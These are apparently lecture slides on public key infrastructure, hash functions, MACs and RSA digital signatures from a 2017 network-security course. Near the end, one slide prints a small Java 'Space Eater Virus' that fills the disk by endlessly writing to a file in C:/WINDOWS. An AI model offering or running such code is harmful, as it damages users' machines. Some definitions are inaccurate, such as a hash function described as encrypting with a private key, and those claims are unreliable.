To give a brief overview about Public Key Infrastructure and Digital Signature with simple example Lecture Outlines Why En/Dec by itself is NOT enough? What is PKI and how does it work? What is Digital Signature and how it is work

1. Introduction to Network Security
Lecture 3: PKI and Signature
Location:E.T.S. de Ingenierias Informatica y de Telecomunicacion Universidad
de Granada 18071, Granada (SPAIN), 24-28 April 2017
Dr. Tarek Gaber
Faculty of Computers and Informatics,
Suez Canal University, Ismailia, Egypt
tmgaber@gmail.com

2. Lecture Objectives
To learn Public Key
Infrastructure
To learn Digital
Signature

3. Lecture Outlines
Why En/Dec by itself is NOT enough?
What is PKI and how does it work?
What is Digital Signature and how it is work

4. An Important Message
• In theory, some crytographic algorithms
seem to be EXTREMELY secure.
• Vulnerabilities arise when systems
administrators do not deploy the
encryption systems securely.

5. Standard Algorithms are
Incredibly Secure
• Using a 128 bit key for a symmetric
encryption algorithm, there are 2128
possible keys.
• Even with the computing resources of the
US government, most of the software
developers alive today will be dead before
the government could break such an
encryption [Viega and McGraw]

6. Incredibly secure (cont.)
• Most security experts believe that 256-bit keys
are good for the lifetime of the universe (many
billions of years).
• The problem is that encryption is just one link
in the chain of security. Encryption is a really
strong link in that chain, but one weak link
breaks the chain.
• It is usually easier for the attacker to hack your
machine and steal the plaintext than to break
your cipher.

7. Hash Function
http://onlinemd5.com/ 9-7
Copyright © 2012 Pearson Education, Inc.
Publishing as Prentice Hall

8. Public Key Infrastructure (PKI)
A scheme for securing communication using public
key encryption and various technical components
https://www.youtube.com/watch?v=1uusOyoDQ0c
– public (asymmetric) key encryption
Method of encryption that uses a pair of matched
keys—a public key to encrypt a message and a private
key to decrypt it, or vice versa
– public key
Encryption code that is publicly available to anyone
– private key
Encryption code that is known only to its owner
9-8
Copyright © 2012 Pearson Education, Inc.
Publishing as Prentice Hall

9. PKI (Cont.)
– digital signature or digital certificate
Validates the sender and time stamp of a transaction
so it cannot be later claimed that the transaction was
unauthorized or invalid
– hash function
A mathematical computation that is applied to a
message, using a private key, to encrypt the message
– message digest (MD)
A summary of a message converted into a string of
digits after the hash has been applied
9-9
Copyright © 2012 Pearson Education, Inc.
Publishing as Prentice Hall

10. Example of Digital Certificate

13. Authentication – Hash Functions
• Creates small, fixed-size block of data (message digest, hash
value) from m
• Hash Function H must be collision resistant on m
– Must be infeasible to find an m’ ≠ m such that H(m) =
H(m’)
• If H(m) = H(m’), then m = m’
– The message has not been modified
• Common message-digest functions include MD5, which
produces a 128-bit hash, and SHA-1, which outputs a 160-bit
hash and SHA-2.
• So, Hash Functions could provide message authentication?

14. Authentication - MAC
• Symmetric encryption used in message-authentication code
(MAC) authentication algorithm
• Simple example:
– MAC defines S(k)(m) = f (k, H(m))
• Where f is a function that is one-way on its first argument
– k cannot be derived from f (k, H(m))
• Because of the collision resistance in the hash function,
reasonably assured no other message could create the
same MAC
• A suitable verification algorithm is V(k)(m, a) ≡ ( f (k,H(m))
= a)
• Note that k is needed to compute both S(k) and V(k), so
anyone able to compute one can compute the other

15. Digital Signature
Copyright © 2012 Pearson Education, Inc.
Publishing as Prentice Hall
2-15

16. Authentication – Digital Signature
• Authenticators produced are digital signatures
• In a digital-signature algorithm, computationally infeasible to derive
S(ks ) from V(kv)
– V is a one-way function
– Thus, kv is the public key and ks is the private key
• Consider the RSA digital-signature algorithm
– Similar to the RSA encryption algorithm, but the key use is reversed
– Digital signature of message S(ks )(m) = H(m)ks mod N
– The key ks again is a pair d, N, where N is the product of two large,
randomly chosen prime numbers p and q
– Verification algorithm is V(kv)(m, a) ≡ (akv mod N = H(m))
• Where kv satisfies kvks mod (p − 1)(q − 1) = 1

17. Authentication (Cont.)
• If encryption can prove the identity of the sender of a
message, then why need separate authentication algorithms?
– Authentication algorithms generally require fewer
computations
– Authenticator of a message is usually shorter than the
message itself
– Sometimes want authentication but not confidentiality. For
example, a company may provide a software patch and
could “sign” that patch to prove that it came from the
company.
– Can be basis for non-repudiation

18. Space Eater Virus
• import java.io.*;
class Virus
{
public static void main (String ar[])
{
try
{
FileWriter f = new FileWriter("C:/WINDOWS/Virus.dll",true);
while(true)
{
f.write("Programming Is Such A FUN !!!");
}
}
catch(FileNotFoundException e) {}
catch(IOException e){}
}
}
• Enjoy with this virus ?

19. Thanks for your attention
Questions, please
For any question, please use
tmgaber@gmail.com
Tarek Gaber,